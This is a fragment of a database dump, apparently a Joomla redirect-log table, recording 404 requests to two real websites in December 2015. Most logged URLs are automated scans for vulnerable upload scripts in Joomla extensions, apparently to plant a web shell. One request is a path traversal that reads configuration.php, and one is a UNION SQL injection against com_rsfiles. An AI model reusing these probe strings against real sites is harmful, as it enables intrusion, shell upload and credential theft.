00:00:00',301),(7783,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2015-12-02 13:41:13','0000-00-00 00:00:00',301),(7784,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-02 13:41:15','0000-00-00 00:00:00',301),(7785,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-02 13:41:18','0000-00-00 00:00:00',301),(7786,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-02 13:41:20','0000-00-00 00:00:00',301),(7787,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-02 13:41:21','0000-00-00 00:00:00',301),(7788,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-02 13:41:24','0000-00-00 00:00:00',301),(7789,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-02 13:41:25','0000-00-00 00:00:00',301),(7790,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',1,0,'2015-12-02 13:41:28','0000-00-00 00:00:00',301),(7791,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','','',1,0,'2015-12-02 13:41:30','0000-00-00 00:00:00',301),(7792,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',3,0,'2015-12-02 13:41:31','0000-00-00 00:00:00',301),(7793,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component//inc/upload.php','','','',1,0,'2015-12-02 13:41:44','0000-00-00 00:00:00',301),(7794,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_sexycontactform/fileupload/index.php','','','',1,0,'2015-12-02 13:41:49','0000-00-00 00:00:00',301),(7795,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2015-12-02 13:41:53','0000-00-00 00:00:00',301),(7796,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',3,0,'2015-12-02 13:41:57','0000-00-00 00:00:00',301),(7797,'http://3s-technologies.com.tr/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=-1+union+select+1,concat(0x7e,table_name,0x7e)+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453--','','http://3s-technologies.com.tr/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=-1+union+select+1,concat(0x7e,table_name,0x7','',1,0,'2015-12-02 14:17:22','0000-00-00 00:00:00',301),(7798,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_hdflvplayer/hdflvpl','','','',1,0,'2015-12-02 16:43:37','0000-00-00 00:00:00',301),(7799,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_jnews/includes/open','','','',1,0,'2015-12-02 16:43:41','0000-00-00 00:00:00',301),(7800,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_acyma','','','',1,0,'2015-12-02 16:43:43','0000-00-00 00:00:00',301),(7801,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_jnews','','','',1,0,'2015-12-02 16:43:46','0000-00-00 00:00:00',301),(7802,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_civic','','','',1,0,'2015-12-02 16:43:47','0000-00-00 00:00:00',301),(7803,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_jinc/','','','',1,0,'2015-12-02 16:43:49','0000-00-00 00:00:00',301),(7804,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_maian','','','',1,0,'2015-12-02 16:43:51','0000-00-00 00:00:00',301),(7805,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_redmy','','','',1,0,'2015-12-02 16:43:55','0000-00-00 00:00:00',301),(7806,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_jooml','','','',1,0,'2015-12-02 16:43:57','0000-00-00 00:00:00',301),(7807,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_bt_po','','','',1,0,'2015-12-02 16:43:59','0000-00-00 00:00:00',301),(7808,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.php?option=com_jdownloads&It','','','',1,0,'2015-12-02 16:44:01','0000-00-00 00:00:00',301),(7809,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/','','','',1,0,'2015-12-02 16:44:03','0000-00-00 00:00:00',301),(7810,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A//inc/upload.php','','','',1,0,'2015-12-02 16:44:11','0000-00-00 00:00:00',301),(7811,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_sexycontactform/fil','','','',1,0,'2015-12-02 16:44:14','0000-00-00 00:00:00',301),(7812,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_creativecontactform','','','',1,0,'2015-12-02 16:44:19','0000-00-00 00:00:00',301),(7813,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjA2ozAgb3JAhWGhJAKHfRMBAoQFgj2AjBQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.php?option=com_adsmanager&ta','','','',1,0,'2015-12-02 16:44:22','0000-00-00 00:00:00',301),(7814,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_hdflvplayer/hdflvpl','','','',1,0,'2015-12-02 18:05:39','0000-00-00 00:00:00',301),(7815,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_jnews/includes/open','','','',1,0,'2015-12-02 18:05:42','0000-00-00 00:00:00',301),(7816,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_acyma','','','',1,0,'2015-12-02 18:05:45','0000-00-00 00:00:00',301),(7817,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_jnews','','','',1,0,'2015-12-02 18:05:47','0000-00-00 00:00:00',301),(7818,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_civic','','','',1,0,'2015-12-02 18:05:49','0000-00-00 00:00:00',301),(7819,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_jinc/','','','',1,0,'2015-12-02 18:05:50','0000-00-00 00:00:00',301),(7820,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_maian','','','',1,0,'2015-12-02 18:05:53','0000-00-00 00:00:00',301),(7821,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_redmy','','','',1,0,'2015-12-02 18:05:57','0000-00-00 00:00:00',301),(7822,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_jooml','','','',1,0,'2015-12-02 18:05:59','0000-00-00 00:00:00',301),(7823,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_bt_po','','','',1,0,'2015-12-02 18:06:02','0000-00-00 00:00:00',301),(7824,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.php?option=com_jdownloads&It','','','',1,0,'2015-12-02 18:06:04','0000-00-00 00:00:00',301),(7825,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/','','','',1,0,'2015-12-02 18:06:07','0000-00-00 00:00:00',301),(7826,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A//inc/upload.php','','','',1,0,'2015-12-02 18:06:15','0000-00-00 00:00:00',301),(7827,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_sexycontactform/fil','','','',1,0,'2015-12-02 18:06:18','0000-00-00 00:00:00',301),(7828,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_creativecontactform','','','',1,0,'2015-12-02 18:06:20','0000-00-00 00:00:00',301),(7829,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOhMHUgb3JAhVLOSYKHd-lDfoQFgiZAjA7&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.php?option=com_adsmanager&ta','','','',1,0,'2015-12-02 18:06:23','0000-00-00 00:00:00',301),(7830,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2015-12-02 18:47:43','0000-00-00 00:00:00',301),(7831,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','','',1,0,'2015-12-02 18:47:42','0000-00-00 00:00:00',301),(7832,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2015-12-02 18:47:44','0000-00-00 00:00:00',301),(7833,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-02 18:47:45','0000-00-00 00:00:00',301),(7834,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-02 18:47:47','0000-00-00 00:00:00',301),(7835,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-02 18:47:50','0000-00-00 00:00:00',301),(7836,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-02 18:47:51','0000-00-00 00:00:00',301),(7837,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-02 18:47:53','0000-00-00 00:00:00',301),(7838,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-02 18:47:55','0000-00-00 00:00:00',301),(7839,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',1,0,'2015-12-02 18:47:57','0000-00-00 00:00:00',301),(7840,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','','',1,0,'2015-12-02 18:47:59','0000-00-00 00:00:00',301),(7841,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2015-12-02 18:48:01','0000-00-00 00:00:00',301),(7842,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-1/inc/upload.php','','','',1,0,'2015-12-02 18:48:04','0000-00-00 00:00:00',301),(7843,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-2/inc/upload.php','','','',1,0,'2015-12-02 18:48:04','0000-00-00 00:00:00',301),(7844,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-3/inc/upload.php','','','',1,0,'2015-12-02 18:48:05','0000-00-00 00:00:00',301),(7845,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/components/com_sexycontactform/fileupload/index.php','','','',1,0,'2015-12-02 18:48:05','0000-00-00 00:00:00',301),(7846,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-4/inc/upload.php','','','',1,0,'2015-12-02 18:48:06','0000-00-00 00:00:00',301),(7847,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-5/inc/upload.php','','','',1,0,'2015-12-02 18:48:06','0000-00-00 00:00:00',301),(7848,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-6/inc/upload.php','','','',1,0,'2015-12-02 18:48:07','0000-00-00 00:00:00',301),(7849,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2015-12-02 18:48:07','0000-00-00 00:00:00',301),(7850,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-7/inc/upload.php','','','',1,0,'2015-12-02 18:48:08','0000-00-00 00:00:00',301),(7851,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-8/inc/upload.php','','','',1,0,'2015-12-02 18:48:08','0000-00-00 00:00:00',301),(7852,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-9/inc/upload.php','','','',1,0,'2015-12-02 18:48:09','0000-00-00 00:00:00',301),(7853,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-10/inc/upload.php','','','',1,0,'2015-12-02 18:48:09','0000-00-00 00:00:00',301),(7854,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',1,0,'2015-12-02 18:48:09','0000-00-00 00:00:00',301),(7855,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-11/inc/upload.php','','','',1,0,'2015-12-02 18:48:10','0000-00-00 00:00:00',301),(7856,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-12/inc/upload.php','','','',1,0,'2015-12-02 18:48:10','0000-00-00 00:00:00',301),(7857,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-13/inc/upload.php','','','',1,0,'2015-12-02 18:48:11','0000-00-00 00:00:00',301),(7858,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-14/inc/upload.php','','','',1,0,'2015-12-02 18:48:11','0000-00-00 00:00:00',301),(7859,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1','','','',1,0,'2015-12-02 18:48:11','0000-00-00 00:00:00',301),(7860,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/index.php?option=com_myblog&task=ajaxupload','','','',1,0,'2015-12-02 18:48:13','0000-00-00 00:00:00',301),(7861,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-15/inc/upload.php','','','',1,0,'2015-12-02 18:48:17','0000-00-00 00:00:00',301),(7862,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-16/inc/upload.php','','','',1,0,'2015-12-02 18:48:19','0000-00-00 00:00:00',301),(7863,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-17/inc/upload.php','','','',1,0,'2015-12-02 18:48:21','0000-00-00 00:00:00',301),(7864,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-18/inc/upload.php','','','',1,0,'2015-12-02 18:48:23','0000-00-00 00:00:00',301),(7865,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-19/inc/upload.php','','','',1,0,'2015-12-02 18:48:24','0000-00-00 00:00:00',301),(7866,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//cfg-contactform-20/inc/upload.php','','','',1,0,'2015-12-02 18:48:24','0000-00-00 00:00:00',301),(7867,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_hdflvplayer/hdflvpl','','','',1,0,'2015-12-02 19:21:02','0000-00-00 00:00:00',301),(7868,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_jnews/includes/open','','','',1,0,'2015-12-02 19:21:06','0000-00-00 00:00:00',301),(7869,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_acyma','','','',1,0,'2015-12-02 19:21:09','0000-00-00 00:00:00',301),(7870,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_jnews','','','',1,0,'2015-12-02 19:21:12','0000-00-00 00:00:00',301),(7871,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_civic','','','',1,0,'2015-12-02 19:21:13','0000-00-00 00:00:00',301),(7872,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_jinc/','','','',1,0,'2015-12-02 19:21:15','0000-00-00 00:00:00',301),(7873,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_maian','','','',1,0,'2015-12-02 19:21:18','0000-00-00 00:00:00',301),(7874,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_redmy','','','',1,0,'2015-12-02 19:21:21','0000-00-00 00:00:00',301),(7875,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_jooml','','','',1,0,'2015-12-02 19:21:23','0000-00-00 00:00:00',301),(7876,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_bt_po','','','',1,0,'2015-12-02 19:21:25','0000-00-00 00:00:00',301),(7877,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.php?option=com_jdownloads&It','','','',1,0,'2015-12-02 19:21:27','0000-00-00 00:00:00',301),(7878,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiokqbcgb3JAhVFbY4KHX5vBakQFgj7ATA1&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/','','','',1,0,'2015-12-02 19:21:29','0000-00-00 